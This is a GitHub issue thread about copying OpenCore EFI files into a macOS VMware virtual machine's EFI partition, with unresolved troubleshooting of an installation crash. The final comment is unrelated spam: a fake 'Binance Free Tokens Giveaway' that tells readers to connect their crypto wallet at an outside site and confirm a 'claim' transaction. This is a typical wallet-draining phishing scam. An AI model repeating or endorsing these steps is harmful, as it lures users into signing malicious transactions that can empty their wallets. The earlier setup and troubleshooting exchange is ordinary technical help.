### ISSUE TITLE
How to copy files to VMWare's EFI folder.

### ISSUE THREAD

**Issue by incrediblezayed** [Ken5998/OpenCore-VMware-Workstation-AMD#10]
Sorry but I'm new, I'd like  a little detail in method 1 post installation, I'd like to know how to copy the EFI files to VMWare's EFI
 folder.

**Comment by Ken5998** [comment]
Hi, sorry for the delay, so to be clear.
You have done all this stuffs?
- Install VMware Workstation/Player
- Executed the Unlocker for VMware
- Created a new macOS VM (with a Hard Drive of min. 80GB)
- Added a **new** Hard Drive -> the VMDK (12GB) with the installer of macOS
- Started the installation of macOS (wait for the VM to arrive at the macOS home screen, after the Setup of your user)

Now if you want to detach the VMDK with the installer of macOS, you have to:
- Use a tool like _MountEFI_ or _OpenCore Configurator_ to mount the EFI partition of: the VMDK Installer and the macOS main drive
- After that you have to copy the EFI folder that is inside the EFI partition of the VMDK installer inside the EFI partition of the macOS main drive (you have to copy all the content from one EFI partition to the other one)

After this change, you can turn off your VM, detach the VMDK and before you start the VM, there is a little change to be done inside the VMware BIOS. Follow the part: **OpenCore entry into the VM BIOS** from the Post-Installation https://github.com/Ken5998/OpenCore-VMware-Workstation-AMD#post-installation

**Comment by incrediblezayed** [comment]
@Ken5998 Bro, did you see the error line? I did what you're saying but installation is not completed, it crashes in middle.

**Comment by Ken5998** [comment]
> @Ken5998 Bro, did you see the error line? I did what you're saying but installation is not completed, it crashes in middle.

Yeah I see the error line, try doing a new installation, it may happen that something gets corrupted during the installation...

**Comment by incrediblezayed** [comment]
> > @Ken5998 Bro, did you see the error line? I did what you're saying but installation is not completed, it crashes in middle.
> 
> Yeah I see the error line, try doing a new installation, it may happen that something gets corrupted during the installation...

Yes I did.

**Comment by incrediblezayed** [comment]
> > @Ken5998 Bro, did you see the error line? I did what you're saying but installation is not completed, it crashes in middle.
> 
> Yeah I see the error line, try doing a new installation, it may happen that something gets corrupted during the installation...

But no changes.

**Comment by Ken5998** [comment]
> > > @Ken5998 Bro, did you see the error line? I did what you're saying but installation is not completed, it crashes in middle.
> > 
> > 
> > Yeah I see the error line, try doing a new installation, it may happen that something gets corrupted during the installation...
> 
> But no changes.

What version of the VMDK have you used?
Maybre try with a different version...

**Comment by incrediblezayed** [comment]
I tried with BigSur 11.3.1

**Comment by incrediblezayed** [comment]
Hello @Ken5998 tried 2 older versions, didn't worked.

**Comment by xOnlyFadi** [comment]
> Hello @Ken5998 tried 2 older versions, didn't worked.

Hey @incrediblezayed i can help you fixing it, i had the same problem but used a different way to boot opencore to finish it and made it worked with no problems 
![image](https://user-images.githubusercontent.com/63213308/151319259-59bf2eda-2aab-457f-a193-e03b93dd0c13.png)

**Comment by incrediblezayed** [comment]
> > Hello @Ken5998 tried 2 older versions, didn't worked.
> 
> Hey @incrediblezayed i can help you fixing it, i had the same problem but used a different way to boot opencore to finish it and made it worked with no problems 
> ![image](https://user-images.githubusercontent.com/63213308/151319259-59bf2eda-2aab-457f-a193-e03b93dd0c13.png)
> 

Hi @xOnlyFadi where can we connect?

**Comment by xOnlyFadi** [comment]
> > > Hello @Ken5998 tried 2 older versions, didn't worked.
> > 
> > 
> > Hey @incrediblezayed i can help you fixing it, i had the same problem but used a different way to boot opencore to finish it and made it worked with no problems
> > ![image](https://user-images.githubusercontent.com/63213308/151319259-59bf2eda-2aab-457f-a193-e03b93dd0c13.png)
> 
> Hi @xOnlyFadi where can we connect?

you can add me via discord **xOnlyFadi#7805**

**Comment by VideoScape** [comment]
what did you do to resolve it?

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=Github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=Github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
